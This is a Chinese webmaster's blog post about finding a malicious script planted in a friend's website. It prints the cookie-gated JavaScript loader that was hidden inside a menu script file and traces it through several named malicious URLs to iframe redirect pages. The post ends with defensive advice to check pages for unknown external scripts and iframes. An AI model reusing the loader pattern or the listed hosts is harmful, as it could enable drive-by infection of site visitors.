浅谈站长如何排除网站挂马

昨晚深邃网友一诺小朋友向我报告说友情链接有一个网站有木马，我一看，晕，那个不是我正在帮朋友做关

键词优化的QQ个性签名么?一开始以为只是杀软误报，加上我也没有装杀毒软件(一直没中过病毒)，所以就没怎么管他?

今天起来用新手机((*^__^*) 嘻嘻……，俺买了黑莓8100)打开百度搜索一下QQ个性签名，晕，排名不知道掉到第几页了。我就郁闷了，自己的SEO优化一直都是很温柔的上的啊，怎么会被降权了?于是就猜想可能真的被挂马了，因为是也算是刚认识的朋友，当然要帮忙处理一下这些琐碎的问题啦。回来之后，马上启用德国杀软小红伞，“滴滴”两声，打开QQ个性签名的时候报警了。于是打开html代码查看，既然没有iframe，这就奇怪了。于是清理缓存再次打开网页，根据小红伞提供的资料找到了报警的文件：info[1].js，打开得到下面的代码：

var az=document.cookie;

var za=az.indexOf(”qqqq”);

if(za!=-1){}else{var expires=new Date();expires.setTime(expires.getTime() 24*60*60*1000);

document.cookie=”qqqq=web;expires=” expires.toGMTString();

document.writeln(””);window.status=” “;}

我想问题应该出在js代码上，于是在代码搜索js，一个是51la的统计的js，另外一个是div.js，51la的自然可以排除，所以我就打开div.js,然后看到了下面“此地无银三百两”的网址代码（红色字体的），一路跟踪下去，果然发现可疑迹象。

// JavaScript Document

function showdiv(divnum,divbefor,id){

for(i=1;i<=divnum;i ){

try{

if(i==divbefor){

document.getElementById(id i).style.display=”inline”;

}else{

document.getElementById(id i).style.display=”none”;

}

}catch(e){ }

}

}

function menuFix(){}

document.writeln(””);

跟踪代码：http://xishiyi.com/images/main/info.js

firefox直接输入，转换得到地址如下http://www.91q.org/templets/images/div.js打开代码如下：

var az=document.cookie;

var za=az.indexOf(”qqqq”);

if(za!=-1){}else{var expires=new Date();expires.setTime(expires.getTime() 24*60*60*1000);

document.cookie=”qqqq=web;expires=” expires.toGMTString();

document.writeln(””);window.status=” “;}

继续iframe跟踪：http://kkwwkkc.cn/10/zz.htm

打开代码如下：

继续iframe跟踪：http://kkwwkkc.cn/10/123.htm

打开得到如下王八代码：

鄙人才疏学浅，看不懂转化了的代码啥意思，不想去转换，知道被挂马就ok了，最后是跟朋友说让他去掉那个代码，清理缓存重新打开网页，ok，没问题了。

写这篇文章的用意在意告诉各位，要注意自己网站的安全，如果发现挂马，不要错过每一个细节，首先仔细检查html页面有没有调用其他莫名的网站的东西，然后仔细分析自己页面的js代码，iframe是黑客们最常用的手段。实例一篇，希望对各位有用。这是我第一次抓马，经过自己的分析既然抓到了，很开心，特此分享……